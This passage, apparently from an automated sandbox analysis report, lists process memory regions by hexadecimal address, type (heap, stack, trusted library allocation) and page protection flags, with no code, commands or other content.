|
||
21D66A86000
|
trusted library allocation
|
page read and write
|
||
17FB94BD000
|
heap
|
page read and write
|
||
21D7D550000
|
trusted library allocation
|
page read and write
|
||
1CC97D39000
|
heap
|
page read and write
|
||
1CC99DB3000
|
heap
|
page read and write
|
||
21D65AB6000
|
trusted library allocation
|
page read and write
|
||
7FFC9FA80000
|
trusted library allocation
|
page read and write
|
||
21D65D48000
|
trusted library allocation
|
page read and write
|
||
1CC9993C000
|
heap
|
page read and write
|
||
21D7D077000
|
heap
|
page read and write
|
||
17FB9261000
|
heap
|
page read and write
|
||
17FB94FB000
|
heap
|
page read and write
|
||
1CC99D83000
|
heap
|
page read and write
|
||
7FFC9FB10000
|
trusted library allocation
|
page read and write
|
||
1CC97AE8000
|
heap
|
page read and write
|
||
1CC9996B000
|
heap
|
page read and write
|
||
17FB939D000
|
heap
|
page read and write
|
||
21D64F34000
|
trusted library allocation
|
page read and write
|
||
17FB94D6000
|
heap
|
page read and write
|
||
21D65DAD000
|
trusted library allocation
|
page read and write
|
||
1CC99D99000
|
heap
|
page read and write
|
||
17FB93F0000
|
heap
|
page read and write
|
||
17FB92A4000
|
heap
|
page read and write
|
||
21D631B0000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
1CC99D3D000
|
heap
|
page read and write
|
||
17FB9503000
|
heap
|
page read and write
|
||
1CC97ACE000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
17FB73B4000
|
heap
|
page read and write
|
||
21D7D950000
|
trusted library allocation
|
page read and write
|
||
17FB73BC000
|
heap
|
page read and write
|
||
17FB957C000
|
heap
|
page read and write
|
||
17FB93EE000
|
heap
|
page read and write
|
||
17FB9267000
|
heap
|
page read and write
|
||
21D7D08A000
|
heap
|
page read and write
|
||
1CC99959000
|
heap
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
21D75007000
|
trusted library allocation
|
page read and write
|
||
21D74FB0000
|
trusted library allocation
|
page read and write
|
||
2F28F9000
|
stack
|
page read and write
|
||
21D7D4C0000
|
trusted library allocation
|
page read and write
|
||
1CC99DC9000
|
heap
|
page read and write
|
||
21D65D15000
|
trusted library allocation
|
page read and write
|
||
17FB94B1000
|
heap
|
page read and write
|
||
1CC99D3B000
|
heap
|
page read and write
|
||
21D65CAE000
|
trusted library allocation
|
page read and write
|
||
17FB93E9000
|
heap
|
page read and write
|
||
21D7D870000
|
trusted library allocation
|
page read and write
|
||
17FB7399000
|
heap
|
page read and write
|
||
17FB73B2000
|
heap
|
page read and write
|
||
17FB94DD000
|
heap
|
page read and write
|
||
7FFC9F9F2000
|
trusted library allocation
|
page read and write
|
||
21D630BD000
|
heap
|
page read and write
|
||
1CC99D20000
|
heap
|
page read and write
|
||
17FB90EC000
|
heap
|
page read and write
|
||
21D64EE0000
|
trusted library allocation
|
page read and write
|
||
1CC99DAD000
|
heap
|
page read and write
|
||
1CC97BAC000
|
heap
|
page read and write
|
||
1CC97D3B000
|
heap
|
page read and write
|
||
17FB93DE000
|
heap
|
page read and write
|
||
1CC99D46000
|
heap
|
page read and write
|
||
32E0B3F000
|
stack
|
page read and write
|
||
17FB9145000
|
heap
|
page read and write
|
||
17FB94FA000
|
heap
|
page read and write
|
||
1CC9995E000
|
heap
|
page read and write
|
||
7FFC9FA70000
|
trusted library allocation
|
page read and write
|
||
1CC995A0000
|
heap
|
page read and write
|
||
17FB9527000
|
heap
|
page read and write
|
||
1CC99D16000
|
heap
|
page read and write
|
||
21D7D099000
|
heap
|
page read and write
|
||
B7D88FE000
|
stack
|
page read and write
|
||
7FFC9FB50000
|
trusted library allocation
|
page read and write
|
||
21D7D730000
|
trusted library allocation
|
page read and write
|
||
21D7D520000
|
trusted library allocation
|
page read and write
|
||
21D7D9C0000
|
trusted library allocation
|
page read and write
|
||
1CC99911000
|
heap
|
page read and write
|
||
1CC99D61000
|
heap
|
page read and write
|
||
B7D8AFE000
|
stack
|
page read and write
|
||
1CC99DAC000
|
heap
|
page read and write
|
||
1CC99D5C000
|
heap
|
page read and write
|
||
21D7CFA0000
|
heap
|
page read and write
|
||
21D7D940000
|
trusted library allocation
|
page read and write
|
||
7FFC9FA04000
|
trusted library allocation
|
page read and write
|
||
7FFC9F863000
|
trusted library allocation
|
page read and write
|
||
1CC99BFD000
|
heap
|
page read and write
|
||
1CC97BAE000
|
heap
|
page read and write
|
||
7FFC9FBB0000
|
trusted library allocation
|
page read and write
|
||
1CC99DB4000
|
heap
|
page read and write
|
||
21D65D5A000
|
trusted library allocation
|
page read and write
|
||
21D65CE5000
|
trusted library allocation
|
page read and write
|
||
17FB73BE000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
21D7D860000
|
trusted library allocation
|
page read and write
|
||
21D7D720000
|
trusted library allocation
|
page read and write
|
||
17FB93D8000
|
heap
|
page read and write
|
||
21D65A14000
|
trusted library allocation
|
page read and write
|
||
21D7D8E0000
|
trusted library allocation
|
page read and write
|
||
17FB917D000
|
heap
|
page read and write
|
||
17FB94E9000
|
heap
|
page read and write
|
||
17FB94BB000
|
heap
|
page read and write
|
||
21D7D8D0000
|
trusted library allocation
|
page read and write
|
||
B7D82F9000
|
stack
|
page read and write
|
||
17FB9501000
|
heap
|
page read and write
|
||
1CC99995000
|
heap
|
page read and write
|
||
21D65A25000
|
trusted library allocation
|
page read and write
|
||
21D7D750000
|
trusted library allocation
|
page read and write
|
||
17FB94DA000
|
heap
|
page read and write
|
||
21D7D268000
|
heap
|
page read and write
|
||
1CC99956000
|
heap
|
page read and write
|
||
1CC99F10000
|
heap
|
page read and write
|
||
1CC99D89000
|
heap
|
page read and write
|
||
7FFC9F853000
|
trusted library allocation
|
page execute and read and write
|
||
21D64DB7000
|
heap
|
page read and write
|
||
1CC99D32000
|
heap
|
page read and write
|
||
7FFC9F906000
|
trusted library allocation
|
page read and write
|
||
21D7D087000
|
heap
|
page read and write
|
||
17FB90F8000
|
heap
|
page read and write
|
||
17FB9406000
|
heap
|
page read and write
|
||
21D7D740000
|
trusted library allocation
|
page read and write
|
||
1CC99D7F000
|
heap
|
page read and write
|
||
7FFC9FBE0000
|
trusted library allocation
|
page read and write
|
||
21D65A02000
|
trusted library allocation
|
page read and write
|
||
1CC99E08000
|
heap
|
page read and write
|
||
1CC99E25000
|
heap
|
page read and write
|
||
17FB94D1000
|
heap
|
page read and write
|
||
21D66038000
|
trusted library allocation
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
21D65FC4000
|
trusted library allocation
|
page read and write
|
||
21D7D510000
|
trusted library allocation
|
page read and write
|
||
7FFC9F860000
|
trusted library allocation
|
page read and write
|
||
21D64F40000
|
trusted library allocation
|
page read and write
|
||
1CC9992C000
|
heap
|
page read and write
|
||
1CC9996B000
|
heap
|
page read and write
|
||
1CC99DB4000
|
heap
|
page read and write
|
||
1CC99D1D000
|
heap
|
page read and write
|
||
17FB950E000
|
heap
|
page read and write
|
||
17FB90DC000
|
heap
|
page read and write
|
||
1CC99D49000
|
heap
|
page read and write
|
||
21D7D820000
|
trusted library allocation
|
page read and write
|
||
21D7D004000
|
heap
|
page read and write
|
||
21D7D079000
|
heap
|
page read and write
|
||
21D7DA20000
|
trusted library allocation
|
page read and write
|
||
21D65C9C000
|
trusted library allocation
|
page read and write
|
||
21D7D06F000
|
heap
|
page read and write
|
||
21D7CFAD000
|
heap
|
page read and write
|
||
17FB7399000
|
heap
|
page read and write
|
||
21D64F51000
|
trusted library allocation
|
page read and write
|
||
21D7DA73000
|
trusted library allocation
|
page read and write
|
||
17FB90CD000
|
heap
|
page read and write
|
||
17FB93F6000
|
heap
|
page read and write
|
||
21D7D4D0000
|
trusted library allocation
|
page read and write
|
||
21D7D8A0000
|
trusted library allocation
|
page read and write
|
||
1CC99AA5000
|
heap
|
page read and write
|
||
1CC99C05000
|
heap
|
page read and write
|
||
7FFC9F85D000
|
trusted library allocation
|
page execute and read and write
|
||
1CC99F11000
|
heap
|
page read and write
|
||
21D7D700000
|
trusted library allocation
|
page read and write
|
||
1CC99AB1000
|
heap
|
page read and write
|
||
1CC97A40000
|
heap
|
page read and write
|
||
17FB90B0000
|
heap
|
page read and write
|
||
17FB9406000
|
heap
|
page read and write
|
||
21D7D910000
|
trusted library allocation
|
page read and write
|
||
1CC99AC1000
|
heap
|
page read and write
|
||
1CC97D3B000
|
heap
|
page read and write
|
||
17FB90D0000
|
heap
|
page read and write
|
||
21D66A34000
|
trusted library allocation
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
17FB93D2000
|
heap
|
page read and write
|
||
1CC99C29000
|
heap
|
page read and write
|
||
1CC99D87000
|
heap
|
page read and write
|
||
1CC99AAA000
|
heap
|
page read and write
|
||
17FB916D000
|
heap
|
page read and write
|
||
17FB9523000
|
heap
|
page read and write
|
||
1CC99D47000
|
heap
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
1CC99D51000
|
heap
|
page read and write
|
||
21D64F40000
|
trusted library allocation
|
page read and write
|
||
1CC99D6E000
|
heap
|
page read and write
|
||
21D65B40000
|
trusted library allocation
|
page read and write
|
||
1CC99D52000
|
heap
|
page read and write
|
||
17FB93CB000
|
heap
|
page read and write
|
||
7FFC9F910000
|
trusted library allocation
|
page execute and read and write
|
||
1CC99ABC000
|
heap
|
page read and write
|
||
17FB90D9000
|
heap
|
page read and write
|
||
7FFC9FA90000
|
trusted library allocation
|
page read and write
|
||
1CC99E05000
|
heap
|
page read and write
|
||
17FB95C5000
|
heap
|
page read and write
|
||
21D7D560000
|
trusted library allocation
|
page read and write
|
||
17FB943B000
|
heap
|
page read and write
|
||
1CC99C3E000
|
heap
|
page read and write
|
||
21D7CFC5000
|
heap
|
page read and write
|
||
21D65FF2000
|
trusted library allocation
|
page read and write
|
||
7FFC9FB60000
|
trusted library allocation
|
page read and write
|
||
7FFC9FAC0000
|
trusted library allocation
|
page read and write
|
||
21D7D830000
|
trusted library allocation
|
page read and write
|
||
1CC99C14000
|
heap
|
page read and write
|
||
21D7DA50000
|
trusted library allocation
|
page read and write
|
||
1CC99DB4000
|
heap
|
page read and write
|
||
17FB9526000
|
heap
|
page read and write
|
||
1CC99D11000
|
heap
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
17FB93F6000
|
heap
|
page read and write
|
||
21D7D7D0000
|
trusted library allocation
|
page read and write
|
||
1CC9992D000
|
heap
|
page read and write
|
||
32E047E000
|
stack
|
page read and write
|
||
1CC9997C000
|
heap
|
page read and write
|
||
1CC99903000
|
heap
|
page read and write
|
||
21D7D800000
|
trusted library allocation
|
page read and write
|
||
17FB9100000
|
heap
|
page read and write
|
||
17FB9564000
|
heap
|
page read and write
|
||
B7D89FE000
|
stack
|
page read and write
|
||
17FB72E5000
|
heap
|
page read and write
|
||
1CC99D39000
|
heap
|
page read and write
|
||
17FB94B0000
|
heap
|
page read and write
|
||
21D66026000
|
trusted library allocation
|
page read and write
|
||
17FB916A000
|
heap
|
page read and write
|
||
1CC99D39000
|
heap
|
page read and write
|
||
1CC99D62000
|
heap
|
page read and write
|
||
21D65C8A000
|
trusted library allocation
|
page read and write
|
||
21D65C78000
|
trusted library allocation
|
page read and write
|
||
21D66054000
|
trusted library allocation
|
page read and write
|
||
21D630CB000
|
heap
|
page read and write
|
||
17FB74EC000
|
heap
|
page read and write
|
||
17FB9519000
|
heap
|
page read and write
|
||
17FB9417000
|
heap
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
17FB9117000
|
heap
|
page read and write
|
||
21D65C67000
|
trusted library allocation
|
page read and write
|
||
32E06FE000
|
stack
|
page read and write
|
||
32E0ABE000
|
stack
|
page read and write
|
||
21D7D09C000
|
heap
|
page read and write
|
||
1CC99DA8000
|
heap
|
page read and write
|
||
21D7D257000
|
heap
|
page read and write
|
||
17FB73B4000
|
heap
|
page read and write
|
||
21D7D099000
|
heap
|
page read and write
|
||
21D64ED4000
|
trusted library allocation
|
page read and write
|
||
17FB94F0000
|
heap
|
page read and write
|
||
17FB90F5000
|
heap
|
page read and write
|
||
21D6308B000
|
heap
|
page read and write
|
||
1CC99B10000
|
heap
|
page read and write
|
||
17FB7250000
|
heap
|
page read and write
|
||
17FB94BB000
|
heap
|
page read and write
|
||
17FB9555000
|
heap
|
page read and write
|
||
21D65AA9000
|
trusted library allocation
|
page read and write
|
||
17FB93F1000
|
heap
|
page read and write
|
||
17FB90FC000
|
heap
|
page read and write
|
||
21D7D840000
|
trusted library allocation
|
page read and write
|
||
21D65CC0000
|
trusted library allocation
|
page read and write
|
||
21D7D850000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
7FFC9FAA0000
|
trusted library allocation
|
page read and write
|
||
21D7D890000
|
trusted library allocation
|
page read and write
|
||
21D7D9D0000
|
trusted library allocation
|
page read and write
|
||
1CC99D79000
|
heap
|
page read and write
|
||
17FB9796000
|
heap
|
page read and write
|
||
21D66C94000
|
trusted library allocation
|
page read and write
|
||
1CC999ED000
|
heap
|
page read and write
|
||
21D7D4E0000
|
trusted library allocation
|
page read and write
|
||
17FB9561000
|
heap
|
page read and write
|
||
1CC97B9A000
|
heap
|
page read and write
|
||
21D7CFBA000
|
heap
|
page read and write
|
||
21D64F80000
|
trusted library allocation
|
page read and write
|
||
17FB924C000
|
heap
|
page read and write
|
||
21D64F60000
|
trusted library allocation
|
page read and write
|
||
21D64F00000
|
heap
|
page execute and read and write
|
||
1CC9990D000
|
heap
|
page read and write
|
||
17FB93F6000
|
heap
|
page read and write
|
||
1CC99D4C000
|
heap
|
page read and write
|
||
17FB73B0000
|
heap
|
page read and write
|
||
17FB9501000
|
heap
|
page read and write
|
||
21D65A6A000
|
trusted library allocation
|
page read and write
|
||
32E077E000
|
stack
|
page read and write
|
||
17FB93D4000
|
heap
|
page read and write
|
||
17FB93AA000
|
heap
|
page read and write
|
||
1CC99979000
|
heap
|
page read and write
|
||
21D7D06D000
|
heap
|
page read and write
|
||
1CC99DB0000
|
heap
|
page read and write
|
||
21D7DA70000
|
trusted library allocation
|
page read and write
|
||
1CC99ABE000
|
heap
|
page read and write
|
||
17FB9501000
|
heap
|
page read and write
|
||
1CC99D87000
|
heap
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
7FFC9FA60000
|
trusted library allocation
|
page read and write
|
||
21D65C3F000
|
trusted library allocation
|
page read and write
|
||
2F2AFE000
|
stack
|
page read and write
|
||
17FB73B4000
|
heap
|
page read and write
|
||
2F29FE000
|
stack
|
page read and write
|
||
21D7D9F9000
|
trusted library allocation
|
page read and write
|
||
17FB9158000
|
heap
|
page read and write
|
||
21D7D256000
|
heap
|
page read and write
|
||
21D7D9B0000
|
trusted library allocation
|
page read and write
|
||
1CC99C0E000
|
heap
|
page read and write
|
||
21D7D790000
|
trusted library allocation
|
page read and write
|
||
21D65AC7000
|
trusted library allocation
|
page read and write
|
||
21D64EE0000
|
trusted library allocation
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
32E067F000
|
stack
|
page read and write
|
||
1CC99A00000
|
heap
|
page read and write
|
||
17FB94B6000
|
heap
|
page read and write
|
||
17FB93ED000
|
heap
|
page read and write
|
||
21D66AA1000
|
trusted library allocation
|
page read and write
|
||
17FB93F7000
|
heap
|
page read and write
|
||
21D64F80000
|
trusted library allocation
|
page read and write
|
||
7FFC9FAF0000
|
trusted library allocation
|
page read and write
|
||
17FB73B5000
|
heap
|
page read and write
|
||
7FFC9FA20000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC9F870000
|
trusted library allocation
|
page read and write
|
||
32E180F000
|
stack
|
page read and write
|
||
21D7514A000
|
trusted library allocation
|
page read and write
|
||
1CC99D6E000
|
heap
|
page read and write
|
||
1CC99AA1000
|
heap
|
page read and write
|
||
1CC99D1B000
|
heap
|
page read and write
|
||
1CC99951000
|
heap
|
page read and write
|
||
17FB73B1000
|
heap
|
page read and write
|
||
B7D86FF000
|
stack
|
page read and write
|
||
1CC99A9E000
|
heap
|
page read and write
|
||
21D62F60000
|
heap
|
page read and write
|
||
1CC99C05000
|
heap
|
page read and write
|
||
17FB94B6000
|
heap
|
page read and write
|
||
21D64A65000
|
heap
|
page read and write
|
||
1CC99907000
|
heap
|
page read and write
|
||
17FB93DE000
|
heap
|
page read and write
|
||
21D63110000
|
trusted library allocation
|
page read and write
|
||
1CC9996B000
|
heap
|
page read and write
|
||
1CC99AA7000
|
heap
|
page read and write
|
||
21D7D7A0000
|
trusted library allocation
|
page read and write
|
||
21D7D035000
|
heap
|
page read and write
|
||
17FB9550000
|
heap
|
page read and write
|
||
1CC97D3E000
|
heap
|
page read and write
|
||
1CC99983000
|
heap
|
page read and write
|
||
21D66C70000
|
trusted library allocation
|
page read and write
|
||
21D63089000
|
heap
|
page read and write
|
||
1CC97AE7000
|
heap
|
page read and write
|
||
17FB90E9000
|
heap
|
page read and write
|
||
32E05FD000
|
stack
|
page read and write
|
||
17FB71E0000
|
heap
|
page read and write
|
||
21D7D8B0000
|
trusted library allocation
|
page read and write
|
||
21D64F20000
|
heap
|
page execute and read and write
|
||
21D65D09000
|
trusted library allocation
|
page read and write
|
||
21D65D29000
|
trusted library allocation
|
page read and write
|
||
17FB914D000
|
heap
|
page read and write
|
||
21D7D960000
|
trusted library allocation
|
page read and write
|
||
7FFC9FB70000
|
trusted library allocation
|
page read and write
|
||
21D65D35000
|
trusted library allocation
|
page read and write
|
||
1CC99D1B000
|
heap
|
page read and write
|
||
17FB93E8000
|
heap
|
page read and write
|
||
1CC99D4B000
|
heap
|
page read and write
|
||
1CC97D38000
|
heap
|
page read and write
|
||
17FB9501000
|
heap
|
page read and write
|
||
17FB73B0000
|
heap
|
page read and write
|
||
1CC99D37000
|
heap
|
page read and write
|
||
1CC99B11000
|
heap
|
page read and write
|
||
17FB9117000
|
heap
|
page read and write
|
||
7FFC9FB40000
|
trusted library allocation
|
page read and write
|
||
1CC97BBB000
|
heap
|
page read and write
|
||
1CC99E55000
|
heap
|
page read and write
|
||
1CC99D4F000
|
heap
|
page read and write
|
||
17FB73AF000
|
heap
|
page read and write
|
||
17FB73B0000
|
heap
|
page read and write
|
||
21D64A60000
|
heap
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
32E04BF000
|
stack
|
page read and write
|
||
21D7D4C0000
|
trusted library allocation
|
page read and write
|
||
7FFC9FB80000
|
trusted library allocation
|
page read and write
|
||
17FB93C2000
|
heap
|
page read and write
|
||
21D7D6E0000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
21D66A75000
|
trusted library allocation
|
page read and write
|
||
7FFC9FAD0000
|
trusted library allocation
|
page read and write
|
||
17FB94DD000
|
heap
|
page read and write
|
||
17FB9131000
|
heap
|
page read and write
|
||
21D7D095000
|
heap
|
page read and write
|
||
17FB9279000
|
heap
|
page read and write
|
||
21D7DA0F000
|
trusted library allocation
|
page read and write
|
||
1CC99901000
|
heap
|
page read and write
|
||
1CC99D10000
|
heap
|
page read and write
|
||
7FFC9FB20000
|
trusted library allocation
|
page read and write
|
||
21D64A47000
|
heap
|
page execute and read and write
|
||
17FB72E9000
|
heap
|
page read and write
|
||
17FB9100000
|
heap
|
page read and write
|
||
7FFC9FA50000
|
trusted library allocation
|
page read and write
|
||
17FB9558000
|
heap
|
page read and write
|
||
21D7D4F0000
|
trusted library allocation
|
page read and write
|
||
17FB912D000
|
heap
|
page read and write
|
||
21D7D4D0000
|
trusted library allocation
|
page read and write
|
||
17FB94F5000
|
heap
|
page read and write
|
||
7FFC9F850000
|
trusted library allocation
|
page read and write
|
||
17FB9541000
|
heap
|
page read and write
|
||
21D7D6C0000
|
trusted library allocation
|
page read and write
|
||
7FFC9F90C000
|
trusted library allocation
|
page execute and read and write
|
||
1CC99D13000
|
heap
|
page read and write
|
||
17FB9110000
|
heap
|
page read and write
|
||
21D7D530000
|
trusted library allocation
|
page read and write
|
||
17FB74EA000
|
heap
|
page read and write
|
||
17FB93C2000
|
heap
|
page read and write
|
||
1CC99945000
|
heap
|
page read and write
|
||
7FFC9FA0C000
|
trusted library allocation
|
page read and write
|
||
1CC99956000
|
heap
|
page read and write
|
||
1CC99D94000
|
heap
|
page read and write
|
||
17FB9583000
|
heap
|
page read and write
|
||
17FB90C5000
|
heap
|
page read and write
|
||
32E057E000
|
stack
|
page read and write
|
||
1CC99960000
|
heap
|
page read and write
|
||
7FFC9FA85000
|
trusted library allocation
|
page read and write
|
||
1CC99DC4000
|
heap
|
page read and write
|
||
21D7D780000
|
trusted library allocation
|
page read and write
|
||
1CC99C3D000
|
heap
|
page read and write
|
||
17FB90BC000
|
heap
|
page read and write
|
||
21D7D7E0000
|
trusted library allocation
|
page read and write
|
||
7FFC9F900000
|
trusted library allocation
|
page read and write
|
||
17FB93F1000
|
heap
|
page read and write
|
||
1CC99956000
|
heap
|
page read and write
|
||
21D7D810000
|
trusted library allocation
|
page read and write
|
||
1CC99979000
|
heap
|
page read and write
|
||
17FB72C0000
|
heap
|
page read and write
|
||
21D65A59000
|
trusted library allocation
|
page read and write
|
||
21D7D8F0000
|
trusted library allocation
|
page read and write
|
||
1CC99952000
|
heap
|
page read and write
|
||
17FB73B9000
|
heap
|
page read and write
|
||
32E0BBB000
|
stack
|
page read and write
|
||
21D64F31000
|
trusted library allocation
|
page read and write
|
||
21D65DB7000
|
trusted library allocation
|
page read and write
|
||
2F2FFE000
|
stack
|
page read and write
|
||
21D7D1A0000
|
heap
|
page read and write
|
||
17FB90DC000
|
heap
|
page read and write
|
||
17FB95A8000
|
heap
|
page read and write
|
||
21D7D9E0000
|
trusted library allocation
|
page read and write
|
||
17FB9500000
|
heap
|
page read and write
|
||
17FB90B1000
|
heap
|
page read and write
|
||
21D66B29000
|
trusted library allocation
|
page read and write
|
||
17FB90E9000
|
heap
|
page read and write
|
||
17FB96B1000
|
heap
|
page read and write
|
||
21D63043000
|
heap
|
page read and write
|
||
17FB93E8000
|
heap
|
page read and write
|
||
21D63180000
|
trusted library allocation
|
page read and write
|
||
17FB72FD000
|
heap
|
page read and write
|
||
17FB91B1000
|
heap
|
page read and write
|
||
21D6304D000
|
heap
|
page read and write
|
||
21D64F54000
|
trusted library allocation
|
page read and write
|
||
21D65C57000
|
trusted library allocation
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
1CC99D61000
|
heap
|
page read and write
|
||
17FB94D8000
|
heap
|
page read and write
|
||
21D63040000
|
heap
|
page read and write
|
||
1CC99DB4000
|
heap
|
page read and write
|
||
21D62FD0000
|
trusted library allocation
|
page read and write
|
||
17FB929D000
|
heap
|
page read and write
|
||
2F32FB000
|
stack
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
21D63000000
|
heap
|
page read and write
|
||
17FB9109000
|
heap
|
page read and write
|
||
21D7D500000
|
trusted library allocation
|
page read and write
|
||
17FB90C1000
|
heap
|
page read and write
|
||
17FB9135000
|
heap
|
page read and write
|
||
21D64ED0000
|
trusted library allocation
|
page read and write
|
||
21D7D9A0000
|
trusted library allocation
|
page read and write
|
||
21D64F50000
|
trusted library allocation
|
page read and write
|
||
1CC99D3C000
|
heap
|
page read and write
|
||
17FB94DB000
|
heap
|
page read and write
|
||
17FB957C000
|
heap
|
page read and write
|
||
21D65FE1000
|
trusted library allocation
|
page read and write
|
||
1CC99D88000
|
heap
|
page read and write
|
||
17FB94DC000
|
heap
|
page read and write
|
||
17FB72E8000
|
heap
|
page read and write
|
||
17FB9526000
|
heap
|
page read and write
|
||
17FB943A000
|
heap
|
page read and write
|
||
21D64F32000
|
trusted library allocation
|
page read and write
|
||
21D7D08F000
|
heap
|
page read and write
|
||
21D65C25000
|
trusted library allocation
|
page read and write
|
||
21D7DA40000
|
trusted library allocation
|
page read and write
|
||
17FB94C3000
|
heap
|
page read and write
|
||
21D64F40000
|
trusted library allocation
|
page read and write
|
||
17FB72CE000
|
heap
|
page read and write
|
||
17FB95A5000
|
heap
|
page read and write
|
||
1CC99D36000
|
heap
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
21D65B5A000
|
trusted library allocation
|
page read and write
|
||
17FB94DD000
|
heap
|
page read and write
|
||
7FFC9FB90000
|
trusted library allocation
|
page read and write
|
||
17FB9555000
|
heap
|
page read and write
|
||
17FB910C000
|
heap
|
page read and write
|
||
21D64F90000
|
heap
|
page read and write
|
||
21D64A40000
|
heap
|
page execute and read and write
|
||
1CC99AB1000
|
heap
|
page read and write
|
||
21D7D920000
|
trusted library allocation
|
page read and write
|
||
17FB9629000
|
heap
|
page read and write
|
||
7FFC9F854000
|
trusted library allocation
|
page read and write
|
||
21D65AD6000
|
trusted library allocation
|
page read and write
|
||
1CC99D62000
|
heap
|
page read and write
|
||
21D7D6F0000
|
trusted library allocation
|
page read and write
|
||
1CC99D16000
|
heap
|
page read and write
|
||
17FB927E000
|
heap
|
page read and write
|
||
17FB73B4000
|
heap
|
page read and write
|
||
7FFC9FBA0000
|
trusted library allocation
|
page read and write
|
||
1CC99914000
|
heap
|
page read and write
|
||
7FFC9FBC0000
|
trusted library allocation
|
page read and write
|
||
1CC99ACF000
|
heap
|
page read and write
|
||
21D65B14000
|
trusted library allocation
|
page read and write
|
||
17FB914C000
|
heap
|
page read and write
|
||
21D65FD0000
|
trusted library allocation
|
page read and write
|
||
1CC99AB5000
|
heap
|
page read and write
|
||
17FB9195000
|
heap
|
page read and write
|
||
21D7D074000
|
heap
|
page read and write
|
||
17FB93DE000
|
heap
|
page read and write
|
||
17FB915A000
|
heap
|
page read and write
|
||
21D7D990000
|
trusted library allocation
|
page read and write
|
||
1CC999F0000
|
heap
|
page read and write
|
||
17FB93F5000
|
heap
|
page read and write
|
||
B7D8BFB000
|
stack
|
page read and write
|
||
1CC99DB4000
|
heap
|
page read and write
|
||
1CC9991D000
|
heap
|
page read and write
|
||
21D62FF0000
|
trusted library allocation
|
page read and write
|
||
21D66C7F000
|
trusted library allocation
|
page read and write
|
||
17FB73AC000
|
heap
|
page read and write
|
||
1CC97D39000
|
heap
|
page read and write
|
||
1CC999B1000
|
heap
|
page read and write
|
||
1CC99979000
|
heap
|
page read and write
|
||
17FB910F000
|
heap
|
page read and write
|
||
17FB90CD000
|
heap
|
page read and write
|
||
21D7D4A0000
|
heap
|
page read and write
|
||
21D7D880000
|
trusted library allocation
|
page read and write
|
||
17FB9274000
|
heap
|
page read and write
|
||
7FFC9FAE7000
|
trusted library allocation
|
page read and write
|
||
1CC99929000
|
heap
|
page read and write
|
||
21D7DA1D000
|
trusted library allocation
|
page read and write
|
||
21D659E1000
|
trusted library allocation
|
page read and write
|
||
21D64F30000
|
trusted library allocation
|
page read and write
|
||
21D65CD2000
|
trusted library allocation
|
page read and write
|
||
17FB917D000
|
heap
|
page read and write
|
||
21D7D24F000
|
heap
|
page read and write
|
||
21D7D760000
|
trusted library allocation
|
page read and write
|
||
17FB957C000
|
heap
|
page read and write
|
||
1CC97C90000
|
heap
|
page read and write
|
||
17FB950E000
|
heap
|
page read and write
|
||
21D64F53000
|
trusted library allocation
|
page read and write
|
||
1CC999A8000
|
heap
|
page read and write
|
||
21D7D9F4000
|
trusted library allocation
|
page read and write
|
||
21D62F40000
|
heap
|
page read and write
|
||
1CC99DC1000
|
heap
|
page read and write
|
||
17FB74EA000
|
heap
|
page read and write
|
||
21D65CF7000
|
trusted library allocation
|
page read and write
|
||
1CC99D1B000
|
heap
|
page read and write
|
||
17FB9569000
|
heap
|
page read and write
|
||
1CC9997A000
|
heap
|
page read and write
|
||
1CC97D30000
|
heap
|
page read and write
|
||
21D64F00000
|
trusted library allocation
|
page read and write
|
||
17FB9554000
|
heap
|
page read and write
|
||
1CC99C0E000
|
heap
|
page read and write
|
||
7FFC9F936000
|
trusted library allocation
|
page execute and read and write
|
||
17FB92A9000
|
heap
|
page read and write
|
||
21D7D930000
|
trusted library allocation
|
page read and write
|
||
17FB941A000
|
heap
|
page read and write
|
||
1CC99D3B000
|
heap
|
page read and write
|
||
2F30FF000
|
stack
|
page read and write
|
||
21D7D0A0000
|
heap
|
page read and write
|
||
1CC99C29000
|
heap
|
page read and write
|
||
1CC99D3D000
|
heap
|
page read and write
|
||
1CC99A9F000
|
heap
|
page read and write
|
||
21D7D7B0000
|
trusted library allocation
|
page read and write
|
||
21D7D082000
|
heap
|
page read and write
|
||
21D64EE0000
|
trusted library allocation
|
page read and write
|
||
21D65A87000
|
trusted library allocation
|
page read and write
|
||
7FFC9F8AC000
|
trusted library allocation
|
page execute and read and write
|
||
17FB918E000
|
heap
|
page read and write
|
||
17FB73AD000
|
heap
|
page read and write
|
||
21D7D570000
|
heap
|
page read and write
|
||
21D7D710000
|
trusted library allocation
|
page read and write
|
||
1CC99C03000
|
heap
|
page read and write
|
||
17FB90B3000
|
heap
|
page read and write
|
||
17FB924E000
|
heap
|
page read and write
|
||
7FFC9FBD0000
|
trusted library allocation
|
page read and write
|
||
21D7D075000
|
heap
|
page read and write
|
||
17FB92AE000
|
heap
|
page read and write
|
||
1CC99AC8000
|
heap
|
page read and write
|
||
1CC97AEA000
|
heap
|
page read and write
|
||
1CC97AC0000
|
heap
|
page read and write
|
||
17FB917D000
|
heap
|
page read and write
|
||
7FFC9FB30000
|
trusted library allocation
|
page read and write
|
||
21D64F60000
|
trusted library allocation
|
page read and write
|
||
17FB9539000
|
heap
|
page read and write
|
||
17FB911E000
|
heap
|
page read and write
|
||
1CC99A9C000
|
heap
|
page read and write
|
||
21D63063000
|
heap
|
page read and write
|
||
17FB73BE000
|
